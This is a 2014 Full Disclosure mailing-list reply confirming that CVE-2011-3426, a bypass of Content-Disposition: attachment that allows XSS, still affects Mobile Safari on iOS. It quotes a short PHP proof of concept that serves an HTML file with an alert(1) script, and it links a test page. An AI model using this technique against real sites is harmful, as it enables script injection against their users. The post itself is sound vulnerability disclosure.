[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: Re: [FD] Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)
- From: "Securify B.V." <lists@xxxxxxxxxxx>
- Date: Wed, 30 Jul 2014 19:01:28 +0200
This issue was originally reported as CVE-2011-3426. We can confirm that
Mobile Safari on iOS 7.1.2 is still affected. We've reported this to
Apple on February 25, 2014. You can test is yourself at:
http://www.securify.nl/cve-2011-3426.html
This test page sets the following HTTP headers:
Content-Disposition: attachment;filename=cve-2011-3426.html
Content-Type: application/octet-stream
With kind regards,
Yorick
On di, 2014-07-29 at 15:56 +0800, heige wrote:
>
> > > Bypassing Content-Disposition: attachment for XSS on
Chrome/Safari(IOS)
> > >
> > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> > >
> > > Test Environment
> > > ipad(ios 6.1.3)
> > > Chrome(26.0.1410.53)
> > >
> > > This code is downloader for attachment which is a HTML file.
> > >
> > > <?php
> > > //down.php
> > > header("Content-Type:text/plain");
> > > //header("Content-Type:text/html");
> > > header("Content-Disposition: attachment; filename=\"test.html\"");
> > > echo "<html><script>alert(1)</script></html>";
> > > ?>
> > >
> > > On IOS , when Chrome/Safari visit the down.php, the HTML code
will be running.Ofcourse, including the javascript and led to cross-site
scripting attacks.
> > >
> >
> from http://www.80vul.com/apple.txt
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/